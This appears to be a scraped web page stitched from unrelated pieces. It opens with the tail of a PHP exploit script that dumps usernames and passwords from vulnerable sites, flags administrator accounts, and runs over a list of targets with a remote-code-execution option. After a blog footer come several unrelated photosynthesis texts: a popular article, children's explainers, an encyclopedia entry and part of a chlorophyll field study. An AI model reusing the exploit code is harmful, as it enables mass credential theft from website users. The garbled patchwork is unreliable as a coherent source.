=(n”)); }else{ $dump = $new_dump; $usertype = 0; } }else{ $usertype = 1; } echo cyan(“n[+] “).”Retrieved data:n”; foreach($dump as $user){ if($usertype){ $adm = strpos($user[‘usertype’], ‘Administrator’) !== false; }else{ $adm = false; } if($less){ if(strpos($user[‘usertype’], “Administrator”) !== false){ echo “n=============== “.green($user[‘username’]).” ===============n”; foreach($user as $key => $data){ if(strlen($data) > 0){ if($key == “username” || $key == “password” || $adm){ echo($key.”: “.red($data).”n”); }else{ echo($key.”: “.$data.”n”); } } } } }else{ echo “n=============== “.green($user[‘username’]).” ===============n”; foreach($user as $key => $data){ if(strlen($data) > 0){ if($key == “username” || $key == “password” || $adm){ echo($key.”: “.red($data).”n”); }else{ echo($key.”: “.$data.”n”); } } } } } echo(green(“nExploit completed! =)nnn”)); }else{ echo(red(“[-] Apparently, the provided target is not vulnerable. =(nn”)); echo(cyan(“[i] “).”This may be a connectivity issue. If you’re persistent, you can try again.n”); } } banner(); check(); if(strlen($target_list) >1){ $targets = explode(PHP_EOL, file_get_contents($target_list)); //split by newline foreach($targets as $website){ if($rce){ rce($target); }else{ if(strlen($website) > 1){ exploit($website); //multiple targets } } } }else{ exploit($target); //single target } ?> Source link Tagged with: Leave a Reply
In your own words, define or describe what you already know about photosynthesis Photosynthesis is the process used by plants, algae and certain bacteria to harness energy from sunlight and turn it into chemical energy. Here, we describe the general principles of photosynthesis and highlight how scientists are studying this natural process to help develop clean fuels and sources of renewable energy. Contents Types of photosynthesis There are two types of photosynthetic processes: oxygenic photosynthesis and anoxygenic photosynthesis. The general principles of anoxygenic and oxygenic photosynthesis are very similar, but oxygenic photosynthesis is the most common and is seen in plants, algae and cyanobacteria. During oxygenic photosynthesis, light energy transfers electrons from water (H2O) to carbon dioxide (CO2), to produce carbohydrates. In this transfer, the CO2 is “reduced,” or receives electrons, and the water becomes “oxidized,” or loses electrons. Ultimately, oxygen is produced along with carbohydrates. Oxygenic photosynthesis functions as a counterbalance to respiration by taking in the carbon dioxide produced by all breathing organisms and reintroducing oxygen to the atmosphere. On the other hand, anoxygenic photosynthesis uses electron donors other than water. The process typically occurs in bacteria such as purple bacteria and green sulfur bacteria, which are primarily found in various aquatic habitats. “Anoxygenic photosynthesis does not produce oxygen — hence the name,” said David Baum, professor of botany at the University of Wisconsin-Madison. “What is produced depends on the electron donor. For example, many bacteria use the bad-eggs-smelling gas hydrogen sulfide, producing solid sulfur as a byproduct.” Though both types of photosynthesis are complex, multistep affairs, the overall process can be neatly summarized as a chemical equation. Oxygenic photosynthesis is written as follows: 6CO2 + 12H2O + Light Energy → C6H12O6 + 6O2 + 6H2O Here, six molecules of carbon dioxide (CO2) combine with 12 molecules of water (H2O) using light energy. The end result is the formation of a single carbohydrate molecule (C6H12O6, or glucose) along with six molecules each of breathable oxygen and water. Similarly, the various anoxygenic photosynthesis reactions can be represented as a single generalized formula: CO2 + 2H2A + Light Energy → + 2A + H2O The letter A in the equation is a variable and H2A represents the potential electron donor. For example, A may represent sulfur in the electron donor hydrogen sulfide (H2S), explained Govindjee and John Whitmarsh, plant biologists at the University of Illinois at Urbana-Champaign, in the book “Concepts in Photobiology: Photosynthesis and Photomorphogenesis” (Narosa Publishers and Kluwer Academic, 1999). Plants need energy from sunlight for photosynthesis to occur. (Image credit: ) The photosynthetic apparatus The following are cellular components essential to photosynthesis. Pigments Pigments are molecules that bestow color on plants, algae and bacteria, but they are also responsible for effectively trapping sunlight. Pigments of different colors absorb different wavelengths of light. Below are the three main groups. • Chlorophylls: These green-colored pigments are capable of trapping blue and red light. Chlorophylls have three subtypes, dubbed chlorophyll a, chlorophyll b and chlorophyll c. According to Eugene Rabinowitch and Govindjee in their book “Photosynthesis”(Wiley, 1969), chlorophyll a is found in all photosynthesizing plants. 
There is also a bacterial variant aptly named bacteriochlorophyll, which absorbs infrared light. This pigment is mainly seen in purple and green bacteria, which perform anoxygenic photosynthesis. • Carotenoids: These red, orange or yellow-colored pigments absorb bluish-green light. Examples of carotenoids are xanthophyll (yellow) and carotene (orange) from which carrots get their color. • Phycobilins: These red or blue pigments absorb wavelengths of light that are not as well absorbed by chlorophylls and carotenoids. They are seen in cyanobacteria and red algae. Plastids Photosynthetic eukaryotic organisms contain organelles called plastids in their cytoplasm. The double-membraned plastids in plants and algae are referred to as primary plastids, while the multiple-membraned variety found in plankton are called secondary plastids, according to an articlein the journal Nature Education by Cheong Xin Chan and Debashish Bhattacharya, researchers at Rutgers University in New Jersey. Plastids generally contain pigments or can store nutrients. Colorless and nonpigmented leucoplasts store fats and starch, while chromoplasts contain carotenoids and chloroplasts contain chlorophyll, as explained in Geoffrey Cooper’s book, “The Cell: A Molecular Approach” (Sinauer Associates, 2000). Photosynthesis occurs in the chloroplasts; specifically, in the grana and stroma regions. The grana is the innermost portion of the organelle; a collection of disc-shaped membranes, stacked into columns like plates. The individual discs are called thylakoids. It is here that the transfer of electrons takes place. The empty spaces between columns of grana constitute the stroma. Chloroplasts are similar to mitochondria, the energy centers of cells, in that they have their own genome, or collection of genes, contained within circular DNA. These genes encode proteins essential to the organelle and to photosynthesis. Like mitochondria, chloroplasts are also thought to have originated from primitive bacterial cells through the process of endosymbiosis. “Plastids originated from engulfed photosynthetic bacteria that were acquired by a single-celled eukaryotic cell more than a billion years ago,” Baum told Live Science. Baum explained that the analysis of chloroplast genes shows that it was once a member of the group cyanobacteria, “the one group of bacteria that can accomplish oxygenic photosynthesis.” In their 2010 article, Chan and Bhattacharya make the point that the formation of secondary plastids cannot be well explained by endosymbiosis of cyanobacteria, and that the origins of this class of plastids are still a matter of debate. Antennae Pigment molecules are associated with proteins, which allow them the flexibility to move toward light and toward one another. A large collection of 100 to 5,000 pigment molecules constitutes “antennae,” according to an article by Wim Vermaas, a professor at Arizona State University. These structures effectively capture light energy from the sun, in the form of photons. Ultimately, light energy must be transferred to a pigment-protein complex that can convert it to chemical energy, in the form of electrons. In plants, for example, light energy is transferred to chlorophyll pigments. The conversion to chemical energy is accomplished when a chlorophyll pigment expels an electron, which can then move on to an appropriate recipient. 
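Because the different pigments absorb at different wavelengths, the photons they capture carry different amounts of energy (E = hc/λ), which is part of why an antenna built from several pigment types can use more of the solar spectrum. The short worked example below is generic; the two peak wavelengths (roughly 430 nm and 662 nm, typical in-vitro values for chlorophyll a) are illustrative assumptions rather than figures from this article.

# Energy per photon and per mole of photons for two illustrative absorption peaks.
H = 6.626e-34        # Planck constant, J*s
C = 2.998e8          # speed of light, m/s
AVOGADRO = 6.022e23  # photons per mole

def photon_energy(wavelength_nm):
    """Return (joules per photon, kJ per mole of photons) for a given wavelength."""
    e_joule = H * C / (wavelength_nm * 1e-9)
    return e_joule, e_joule * AVOGADRO / 1000.0

for label, nm in [("blue peak ~430 nm", 430), ("red peak ~662 nm", 662)]:
    e_j, e_kj_mol = photon_energy(nm)
    print(f"{label}: {e_j:.2e} J/photon, {e_kj_mol:.0f} kJ/mol")
# Blue photons carry roughly 1.5 times the energy of red photons, so pigments with
# different absorption peaks let the antenna harvest a wider slice of sunlight.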
Reaction centers The pigments and proteins, which convert light energy to chemical energy and begin the process of electron transfer, are known as reaction centers. The photosynthetic process The reactions of plant photosynthesis are divided into those that require the presence of sunlight and those that do not. Both types of reactions take place in chloroplasts: light-dependent reactions in the thylakoid and light-independent reactions in the stroma. Light-dependent reactions (also called light reactions): When a photon of light hits the reaction center, a pigment molecule such as chlorophyll releases an electron. “The trick to do useful work, is to prevent that electron from finding its way back to its original home,” Baum told Live Science. “This is not easily avoided, because the chlorophyll now has an ‘electron hole’ that tends to pull on nearby electrons.” The released electron manages to escape by traveling through an electron transport chain, which generates the energy needed to produce ATP (adenosine triphosphate, a source of chemical energy for cells) and NADPH. The “electron hole” in the original chlorophyll pigment is filled by taking an electron from water. As a result, oxygen is released into the atmosphere. Light-independent reactions (also called dark reactions and known as the Calvin cycle): Light reactions produce ATP and NADPH, which are the rich energy sources that drive dark reactions. Three chemical reaction steps make up the Calvin cycle: carbon fixation, reduction and regeneration. These reactions use water and catalysts. The carbon atoms from carbon dioxide are “fixed,” when they are built into organic molecules that ultimately form three-carbon sugars. These sugars are then used to make glucose or are recycled to initiate the Calvin cycle again. This June 2010 satellite photo shows ponds growing algae in southern California. (Image credit: PNNL, QuickBird satellite) Photosynthesis in the future Photosynthetic organisms are a possible means to generate clean-burning fuels such as hydrogen or even methane. Recently, a research group at the University of Turku in Finland, tapped into the ability of green algae to produce hydrogen. Green algae can produce hydrogen for a few seconds if they are first exposed to dark, anaerobic (oxygen-free) conditions and then exposed to light The team devised a way to extend green algae’s hydrogen production for up to three days, as reported in their 2018 study published in the journal Energy & Environmental Science. Scientists have also made advances in the field of artificial photosynthesis. For instance, a group of researchers from the University of California, Berkeley, developed an artificial system to capture carbon dioxide using nanowires, or wires that are a few billionths of a meter in diameter. The wires feed into a system of microbes that reduce carbon dioxide into fuels or polymers by using energy from sunlight. The team published its design in 2015 in the journal Nano Letters. In 2016, members of this same group published a study in the journal Science that described another artificial photosynthetic system in which specially engineered bacteria were used to create liquid fuels using sunlight, water and carbon dioxide. In general, plants are only able to harness about one percent of solar energy and use it to produce organic compounds during photosynthesis. In contrast, the researchers’ artificial system was able to harness 10 percent of solar energy to produce organic compounds. 
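To put the "about one percent" versus "10 percent" conversion figures in perspective, a rough back-of-the-envelope estimate helps. The insolation value and the energy content of glucose used below are round illustrative assumptions, not numbers taken from the studies cited above.

# Rough estimate of glucose-equivalent chemical energy stored per square metre per day
# at different solar-conversion efficiencies.
# Assumptions (illustrative only): ~5 kWh/m^2/day of insolation and a glucose energy
# content of ~15.6 kJ/g; real values vary with location, season and species.

INSOLATION_KWH_PER_M2_DAY = 5.0
GLUCOSE_KJ_PER_G = 15.6

def glucose_equivalent_grams(efficiency):
    energy_kj = INSOLATION_KWH_PER_M2_DAY * 3600.0 * efficiency  # kWh -> kJ
    return energy_kj / GLUCOSE_KJ_PER_G

for eff in (0.01, 0.10):  # ~1% (natural) vs ~10% (reported for the artificial system)
    print(f"{eff:.0%}: ~{glucose_equivalent_grams(eff):.0f} g glucose-equivalent per m^2 per day")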
Continued research of natural processes, such as photosynthesis, aids scientists in developing new ways to utilize various sources of renewable energy. Seeing as sunlight, plants and bacteria are all ubiquitous, tapping into the power of photosynthesis is a logical step for creating clean-burning and carbon-neutral fuels. Additional resources: • University of California, Berkeley: Photosynthetic Pigments • Arizona State University: An Introduction to Photosynthesis and Its Applications • University of Illinois at Urbana-Champaign: What Is Photosynthesis? Photosynthesis for Kids What is Photosynthesis? The word photosynthesis can be separated to make two smaller words: “photo” which means light “synthesis” which means putting together Plants need food but they do not have to wait on people or animals to provide for them. Most plants are able to make their own food whenever they need it. This is done using light and the process is called photosynthesis. Photosynthesis is the process by which plants make their own food. We will add more details to this definition after making a few things clear as you will see below. What is needed for Photosynthesis? To make food, plants need not just one but all of the following: • carbon dioxide • water • sunlight Let’s take a look at how these are collected by plants. • Carbon dioxide from the air passes through small pores (holes) in the leaves. These pores are called stomata. • Water is absorbed by the roots and passes through vessels in the stem on its way to the leaves. • Sunlight is absorbed by a green chemical in the leaves. What happens during Photosynthesis? The photosynthesis process takes place in the leaves of plants. The leaves are made up of very small cells. Inside these cells are tiny structures called chloroplasts. Each chloroplast contains a green chemical called chlorophyll which gives leaves their green color. • Chlorophyll absorbs the sun’s energy. • It is this energy that is used to split water molecules into hydrogen and oxygen. • Oxygen is released from the leaves into the atmosphere. • Hydrogen and carbon dioxide are used to form glucose or food for plants. Some of the glucose is used to provide energy for the growth and development of plants while the rest is stored in leaves, roots or fruits for later use by plants. Here is the process in greater detail: Photosynthesis occurs in two stages commonly known as Light dependent Reactions and the Calvin Cycle. Light dependent Reactions Light dependent reactions occur in the thylakoid membrane of the chloroplasts and take place only when light is available. During these reactions light energy is converted to chemical energy. • Chlorophyll and other pigments absorb energy from sunlight. This energy is transferred to the photosystems responsible for photosynthesis. • Water is used to provide electrons and hydrogen ions but also produces oxygen. Do you remember what happens to the oxygen? • The electrons and hydrogen ions are used to create ATP and NADPH. ATP is an energy storage molecule. NADPH is an electron carrier/donor molecule. Both ATP and NADPH will be used in the next stage of photosynthesis. Details about the flow of electrons through Photosystem II, b6-f complex, Photosystem I and NADP reductase have not been included here but can be found under The Process of Photosynthesis in Plants. The Calvin Cycle The Calvin Cycle reactions occur in the stroma of the chloroplasts. 
Although these reactions can take place without light, the process requires ATP and NADPH which were created using light in the first stage. Carbon dioxide and energy from ATP along with NADPH are used to form glucose. More details about the formation of sugars can be found under the Process of Photosynthesis in Plants.

What have you learned so far?

You already know that plants need carbon dioxide, water and sunlight to make their food. You also know that the food they make is called glucose. In addition to glucose, plants also produce oxygen. This information can be written in a word equation as shown below:

carbon dioxide + water + light energy → glucose + oxygen

The equation below is the same as the one above but it shows the chemical formula for carbon dioxide, water, glucose and oxygen:

6CO2 + 6H2O + light energy → C6H12O6 + 6O2

Now back to the definition… Earlier you learned that photosynthesis is the process by which plants make their own food. Now that we know what plants need to make food, we can add that information as shown below. Photosynthesis is the process by which plants make their own food using carbon dioxide, water and sunlight.

What does Photosynthesis produce?

Photosynthesis is important because it provides two main things:
• food
• oxygen

Some of the glucose that plants produce during photosynthesis is stored in fruits and roots. This is why we are able to eat carrots, potatoes, apples, water melons and all the others. These foods provide energy for humans and animals. Oxygen that is produced during photosynthesis is released into the atmosphere. This oxygen is what we breathe and we cannot live without it.

While it is important that photosynthesis provides food and oxygen, its impact on our daily lives is far more extensive. Photosynthesis is so essential to life on earth that most living organisms, including humans, cannot survive without it. All of our energy for growth, development and physical activity comes from eating food from plants and animals. Animals obtain energy from eating plants. Plants obtain energy from glucose made during photosynthesis. Our major sources of energy such as natural gas, coal and oil were made millions of years ago from the remains of dead plants and animals which we already know got their energy from photosynthesis. Photosynthesis is also responsible for balancing oxygen and carbon dioxide levels in the atmosphere. Plants absorb carbon dioxide from the air and release oxygen during the process of photosynthesis.

Photosynthesis

Photosynthesis, the process by which green plants and certain other organisms transform light energy into chemical energy. During photosynthesis in green plants, light energy is captured and used to convert water, carbon dioxide, and minerals into oxygen and energy-rich organic compounds.

Diagram of photosynthesis showing how water, light, and carbon dioxide are absorbed by a plant to produce oxygen, sugars, and more carbon dioxide. (Image credit: Encyclopædia Britannica, Inc.)

Top Questions

Why is photosynthesis important?
If photosynthesis ceased, there would soon be little food or other organic matter on Earth, most organisms would disappear, and Earth’s atmosphere would eventually become nearly devoid of gaseous oxygen. What is the basic formula for photosynthesis? The process of photosynthesis is commonly written as: 6CO2 + 6H2O → C6H12O6 + 6O2. This means that the reactants, six carbon dioxide molecules and six water molecules, are converted by light energy captured by chlorophyll (implied by the arrow) into a sugar molecule and six oxygen molecules, the products. The sugar is used by the organism, and the oxygen is released as a by-product. Read more below: General characteristics: Overall reaction of photosynthesis Which organisms can photosynthesize? The ability to photosynthesize is found in both eukaryotic and prokaryotic organisms. The most well-known examples are plants, as all but a very few parasitic or mycoheterotrophic species contain chlorophyll and produce their own food. Algae are the other dominant group of eukaryotic photosynthetic organisms. All algae, which include massive kelps and microscopic diatoms, are important primary producers. Cyanobacteria and certain sulfur bacteria are photosynthetic prokaryotes, in whom photosynthesis evolved. No animals are thought to be independently capable of photosynthesis, though the emerald green sea slug can temporarily incorporate algae chloroplasts in its body for food production. It would be impossible to overestimate the importance of photosynthesis in the maintenance of life on Earth. If photosynthesis ceased, there would soon be little food or other organic matter on Earth. Most organisms would disappear, and in time Earth’s atmosphere would become nearly devoid of gaseous oxygen. The only organisms able to exist under such conditions would be the chemosynthetic bacteria, which can utilize the chemical energy of certain inorganic compounds and thus are not dependent on the conversion of light energy. Energy produced by photosynthesis carried out by plants millions of years ago is responsible for the fossil fuels (i.e., coal, oil, and gas) that power industrial society. In past ages, green plants and small organisms that fed on plants increased faster than they were consumed, and their remains were deposited in Earth’s crust by sedimentation and other geological processes. There, protected from oxidation, these organic remains were slowly converted to fossil fuels. These fuels not only provide much of the energy used in factories, homes, and transportation but also serve as the raw material for plastics and other synthetic products. Unfortunately, modern civilization is using up in a few centuries the excess of photosynthetic production accumulated over millions of years. Consequently, the carbon dioxide that has been removed from the air to make carbohydrates in photosynthesis over millions of years is being returned at an incredibly rapid rate. The carbon dioxide concentration in Earth’s atmosphere is rising the fastest it ever has in Earth’s history, and this phenomenon is expected to have major implications on Earth’s climate. Requirements for food, materials, and energy in a world where human population is rapidly growing have created a need to increase both the amount of photosynthesis and the efficiency of converting photosynthetic output into products useful to people. 
One response to those needs—the so-called Green Revolution, begun in the mid-20th century—achieved enormous improvements in agricultural yield through the use of chemical fertilizers, pest and plant-disease control, plant breeding, and mechanized tilling, harvesting, and crop processing. This effort limited severe famines to a few areas of the world despite rapid population growth, but it did not eliminate widespread malnutrition. Moreover, beginning in the early 1990s, the rate at which yields of major crops increased began to decline. This was especially true for rice in Asia. Rising costs associated with sustaining high rates of agricultural production, which required ever-increasing inputs of fertilizers and pesticides and constant development of new plant varieties, also became problematic for farmers in many countries.

A second agricultural revolution, based on plant genetic engineering, was forecast to lead to increases in plant productivity and thereby partially alleviate malnutrition. Since the 1970s, molecular biologists have possessed the means to alter a plant's genetic material (deoxyribonucleic acid, or DNA) with the aim of achieving improvements in disease and drought resistance, product yield and quality, frost hardiness, and other desirable properties. However, such traits are inherently complex, and the process of making changes to crop plants through genetic engineering has turned out to be more complicated than anticipated. In the future such genetic engineering may result in improvements in the process of photosynthesis, but by the first decades of the 21st century, it had yet to demonstrate that it could dramatically increase crop yields.

Another intriguing area in the study of photosynthesis has been the discovery that certain animals are able to convert light energy into chemical energy. The emerald green sea slug (Elysia chlorotica), for example, acquires genes and chloroplasts from Vaucheria litorea, an alga it consumes, giving it a limited ability to produce chlorophyll. When enough chloroplasts are assimilated, the slug may forgo the ingestion of food. The pea aphid (Acyrthosiphon pisum) can harness light to manufacture the energy-rich compound adenosine triphosphate (ATP); this ability has been linked to the aphid's manufacture of carotenoid pigments.

What Is Photosynthesis: Chlorophyll And Photosynthesis For Kids

What is chlorophyll and what is photosynthesis? Most of us already know the answers to these questions but for kids, this can be uncharted waters. To help kids gain a better understanding of the role of chlorophyll in photosynthesis in plants, keep reading.

What is Photosynthesis?

Plants, just like humans, require food in order to survive and grow. However, a plant's food looks nothing like our food. Plants are the greatest consumer of solar energy, using power from the sun to mix up an energy rich meal. The process where plants make their own food is known as photosynthesis. Photosynthesis in plants is an extremely useful process whereby green plants take up carbon dioxide (a toxin) from the air and produce rich oxygen. Green plants are the only living thing on earth that are capable of converting the sun's energy into food. Almost all living things are dependent upon the process of photosynthesis for life. Without plants, we would not have oxygen and the animals would have nothing to eat, and neither would we.

What is Chlorophyll?
The role of chlorophyll in photosynthesis is vital. Chlorophyll, which resides in the chloroplasts of plants, is the green pigment that is necessary in order for plants to convert carbon dioxide and water, using sunlight, into oxygen and glucose. During photosynthesis, chlorophyll captures the sun’s rays and creates sugary carbohydrates or energy, which allows the plant to grow. Understanding Chlorophyll and Photosynthesis for Kids Teaching children about the process of photosynthesis and the importance of chlorophyll is an integral part of most elementary and middle school science curriculums. Although the process is quite complex in its entirety, it can be simplified enough so that younger children can grasp the concept. Photosynthesis in plants can be compared with the digestive system in that they both break down vital elements to produce energy that is used for nourishment and growth. Some of this energy is used immediately, and some is stored for later use. Many younger children may have the misconception that plants take in food from their surroundings; therefore, teaching them the process of photosynthesis is vital to them grasping the fact that plants actually gather the raw ingredients necessary to make their own food. Photosynthesis Activity for Kids Hands-on activities are the best way to teach kids how the process of photosynthesis works. Demonstrate how the sun is necessary for photosynthesis by placing one bean sprout in a sunny location and one in a dark location. Both plants should be watered regularly. As students observe and compare the two plants over time, they will see the importance of sunlight. The bean plant in the sun will grow and thrive while the bean plant in the dark will become very sickly and brown. This activity will demonstrate that a plant cannot make its own food in the absence of sunlight. Have children sketch pictures of the two plants over several weeks and make notes regarding their observations. Factors Influencing Leaf Chlorophyll Content in Natural Forests at the Biome Scale Introduction Photosynthesis is the most important source of energy for plant growth (Mackinney, 1941; Baker, 2008), because chlorophyll (Chl) represents an important pigment for photosynthesis. The photosynthetic reaction is mainly divided into three steps: (1) primary reaction, (2) photosynthetic electron transport and photophosphorylation, and (3) carbon assimilation. Chlorophyll a (Chl a) and chlorophyll b (Chl b) are essential for the primary reaction. Chl a and Chl b absorb sunlight at different wavelengths (Chl a mainly absorbs red-orange light and Chl b mainly absorbs blue-purple light), leading to the assumption that the total amount leaf chlorophyll content (Chl a+b) and allocated ratio (Chl a/b) directly influence the photosynthetic capacity of plants. This assumption has been verified by a controlled experiment using several plant species (Croft et al., 2017). However, to date, it is unclear how leaf Chl content varies among plant species, plant functional groups (PFGs), and communities in natural forests, especially at a large scale. When considering on the importance of Chl for photosynthesis, plants in the natural community should optimize light absorption and photosynthesis by adjusting the content and ratios of Chl to enhance growth and survival at the long-term evolutionary scale. Certain factors might influence Chl levels. From the perspective of phylogeny, stable traits are the results of long-term adaption and evolution to the external environments. 
If Chl were a stable trait, the length of evolutionary history should have a constraining effect on it. In other words, Chl should be influenced by phylogeny. Some studies have demonstrated that phyletic evolution significantly influences certain leaf traits, such as element content and wood traits (He et al., 2010; Zhang et al., 2011; Liu et al., 2012; Zhao et al., 2014). If Chl really is influenced by phylogeny, patterns in Chl should be interpreted only after excluding phylogenetic effects, for example by using phylogenetically independent contrasts, in future studies. Alternatively, plants inevitably adjust their own traits to adapt to different environments. Therefore, it is widely considered that plants should adjust Chl (Chl a, Chl b, Chl a+b, and Chl a/b) to adapt to a given environment and optimize photosynthesis. Thus, climate and soils should play important roles in regulating Chl, especially at a large scale. Chlorophyll synthesis requires many elements from soils; thus, soils should influence Chl (Fredeen et al., 1990). Chlorophyll synthesis also proceeds through a series of enzymatic reactions; temperatures that are too high or too low inhibit these reactions and may even destroy existing chlorophyll. The optimum temperature for chlorophyll synthesis in most plants is about 30°C, with DVR enzyme activity peaking at that temperature (Nagata et al., 2005). Thus, temperature also influences chlorophyll synthesis (Wolken et al., 1955). Precipitation might affect the photochemical activity of chloroplasts (Zhou, 2003), with water being the medium used for transporting nutrients in plants, as mineral salts must be dissolved in water to be absorbed by plants. Consequently, chlorophyll synthesis and water are closely related. A lack of water in leaves impairs the synthesis of chlorophyll, promotes its decomposition, and accelerates leaf yellowing. There is also indirect evidence that Chl is jointly controlled by climate and soils; thus, Chl might be an indicative trait for characterizing how plants respond to climate change. A major challenge is establishing how to link traits and functioning in natural ecosystems; yet, such knowledge is important for predicting how ecosystem functioning varies with changing environments (Garnier and Navas, 2012; Reichstein et al., 2014). Because of the importance of Chl for photosynthesis, scientists have assumed that a relationship between Chl and gross primary production (GPP) exists and have used this relationship for model optimization. For instance, Croft et al. (2017) found that, for several plant species, Chl is a better proxy for photosynthetic efficiency than the traditional substitute, leaf N content, when establishing models of GPP in forest communities. This approach was innovative and exciting for scientists involved in physiological ecology and macroecology. Leaf Chl content reliably represents the maximum rate of carboxylation (Vmax) and has the potential for use as a proxy in models in the future (Croft et al., 2017). However, it is difficult to obtain data on Chl in natural communities, especially at a large scale. In this study, we investigated Chl across 823 plant species from nine forests, extending from tropical forests to cold-temperate forests in eastern China. Using these data, we explored variation in Chl, latitudinal patterns, and the underlying influencing factors (climate, soil, and phylogeny).
The main objectives of this study were to: (1) investigate how Chl varies in natural forests among different plant species, PFGs, and communities; (2) determine whether there is a latitudinal pattern in Chl; (3) identify the main factors influencing Chl (phylogeny, climate, and soil); and (4) provide large-scale evidence supporting the concept that Chl is a reliable proxy of Vmax in global ecological models. Materials and Methods Site Description The North-South Transect of Eastern China (NSTEC) is the fifteenth standard transect of the International Geosphere-Biosphere Programme (IGBP); it is a unique forest belt mainly driven by a thermal gradient and encompasses almost all forest types found in the Northern Hemisphere (Canadell et al., 2002). In this study, nine natural forests were selected along the 4,200-km NSTEC transect: Jiangfeng (JF), Dinghu (DH), Jiulian (JL), Shennong (SN), Taiyue (TY), Dongling (DL), Changbai (CB), Liangshui (LS), and Huzhong (HZ) (Figure S1). These nine forests span cold-temperate, temperate, subtropical, and tropical forests from 18.7 to 51.8°N. The mean annual temperature (MAT) of these forests ranges from −4.4 to 20.9°C, while mean annual precipitation (MAP) ranges from 481.6 to 2449.0 mm. Soils vary from tropical red soils with low organic matter to brown soils with high organic matter (Song et al., 2016). Detailed geographical information on the sites is presented in Table S1. Field Sampling The field survey was conducted between July and August of 2013. First, four experimental plots (30 × 40 m) were selected in each forest. The geographical details, plant species composition, and community structure were determined for each plot. Trees were measured within the 30 × 40 m plots. Next, four quadrats (5 × 5 m) for shrubs and four quadrats (1 × 1 m) for herbs were set up at the four corners of each experimental plot. All common species, including trees, shrubs, and herbs, were identified in each plot. Subsequently, we collected more than 30 leaves from each species, of which four were randomly selected, cut up, and used to determine the chlorophyll content of each plant species within the plot. We chose mature and healthy trees and collected fully expanded, sun-exposed leaves from four individuals of each plant species, which were treated as four replicates (Zhao et al., 2016). Overall, the leaves of 823 plant species were collected. Soil samples (0–10 cm depth) were randomly collected from 30 to 50 points using a soil sampler (6-cm diameter) in each plot and were combined to form one composite sample per plot (Tian et al., 2016; Wang et al., 2016; Li et al., 2018). Measurement of Leaf Chlorophyll Content Fresh leaves were cleaned to remove soil and other contaminants, and 0.1 g of fresh leaves was used to extract chlorophyll in 95% ethanol, with four replicates for each plant species. The Chl content (Chl a and Chl b) of the filtered solution was measured using the classical spectrophotometric method with a spectrophotometer (Pharma Spec, UV-1700, Shimadzu, Japan) (Mackinney, 1941; Li et al., 2018).
According to the Lambert-Beer law, the relationship between concentration and optical density is:

D665 = 83.31 Ca + 18.60 Cb (1)

D649 = 24.54 Ca + 44.24 Cb (2)

G = Ca + Cb (3)

where D665 and D649 are the optical densities of the chlorophyll solution at wavelengths of 665 and 649 nm; Ca, Cb, and G are the concentrations of Chl a, Chl b, and total Chl, respectively (g L−1); 83.31 and 18.60 are the specific absorption coefficients of Chl a and Chl b at a wavelength of 665 nm; and 24.54 and 44.24 are the specific absorption coefficients of Chl a and Chl b at a wavelength of 649 nm.

Chl a (mg g−1) = Ca × 50/(1000 × 0.1) (4)

Chl b (mg g−1) = Cb × 50/(1000 × 0.1) (5)

Then, Chl a+b and Chl a/b were calculated (mg g−1, leaf fresh mass, FM) as:

Chl a+b (mg g−1) = G × 50/(1000 × 0.1) (6)

Chl a/b = Chl a / Chl b (7)

Measurement of Soil Parameters Soil samples were acidified with HNO3 and HF overnight. Then, the samples were digested using a microwave digestion system (Mars X Press Microwave Digestion system, CEM, Matthews, NC, USA) before analyzing soil total phosphorus (STP) content. An elemental analyzer (Vario Analyzer, Elementar, Germany) was used to measure soil organic carbon (SOC) and soil total nitrogen (STN). Soil pH was determined with a pH meter (Mettler Toledo Delta 320, Switzerland) using a slurry of soil and distilled water (1:2.5) (Zhao et al., 2014). Climate Data The primary climate variables, including mean annual temperature (MAT) and mean annual precipitation (MAP), were extracted from a climate dataset at a 1 × 1 km spatial resolution. The data were collected at 740 climate stations of the China Meteorological Administration, from 1961 to 2007, and interpolated using the software ANUSPLIN (He et al., 2014). Phylogeny The 823 plant species were used to construct a phylogenetic tree at the species and family levels. First, we checked the species information in the Plant List (http://www.theplantlist.org/) and confirmed the correct Latin name of each species. Second, we defined a reference phylogenetic tree by using the "phytools" package in R together with S.PhyloMaker (Qian and Jin, 2016), and generated the phylogenetic tree in MEGA 5.1. Finally, using the BLADJ algorithm provided by the software Phylocom (Webb et al., 2008), and according to molecular and fossil dating data (Wikström et al., 2001), we calculated the age of each node in the phylogenetic tree (in millions of years, MY). At the family level, we dated the evolution of angiosperm families according to the molecular and fossil dating data. Statistical Analysis Plant species were divided by plant functional group (PFG: trees, shrubs, and herbs), growth form (coniferous or broadleaved tree), and leaf type (evergreen or deciduous tree). One-way analysis of variance (ANOVA) with post-hoc Duncan's multiple comparisons was used to test the differences in Chl among sites, PFGs, and leaf types. We used regression analyses to explore latitudinal patterns in Chl. To analyze the factors influencing Chl, we calculated Spearman's rank correlation coefficients for the 823 plant species across sites, PFGs, and leaf types. We then used redundancy analysis (RDA) to analyze the relative influences of climate, soil, and the interspecific variation of species. The strength of the phylogenetic signal in Chl a, Chl b, Chl a+b, and Chl a/b across plant species was quantified using Blomberg's K statistic, which tests whether closely related species resemble each other in a trait more than expected by chance (Blomberg et al., 2003).
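For readers who want to reproduce the arithmetic of Equations (1)–(7), the short Python sketch below solves the two absorbance equations for Ca and Cb and then applies the conversion to mg per gram of fresh leaf exactly as written above. The function name and the example optical densities are invented for illustration; only the coefficients, the 50 mL extract volume, and the 0.1 g fresh mass come from the text.

```python
import numpy as np

def chlorophyll_from_absorbance(d665, d649, extract_ml=50.0, fresh_mass_g=0.1):
    """Solve Eqs. (1)-(2) for the Chl a and Chl b concentrations (Ca, Cb),
    then convert to mg per g fresh mass with Eqs. (4)-(7)."""
    # Specific absorption coefficients at 665 and 649 nm (from the text).
    A = np.array([[83.31, 18.60],
                  [24.54, 44.24]])
    d = np.array([d665, d649])
    ca, cb = np.linalg.solve(A, d)                 # concentrations in the extract
    g = ca + cb                                    # Eq. (3), total chlorophyll
    scale = extract_ml / (1000.0 * fresh_mass_g)   # Eqs. (4)-(6): x 50 / (1000 x 0.1)
    chl_a, chl_b, chl_ab = ca * scale, cb * scale, g * scale
    return {"Chl a": chl_a, "Chl b": chl_b,
            "Chl a+b": chl_ab, "Chl a/b": chl_a / chl_b}   # Eq. (7)

# Hypothetical optical densities, for illustration only.
print(chlorophyll_from_absorbance(d665=0.65, d649=0.30))
```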
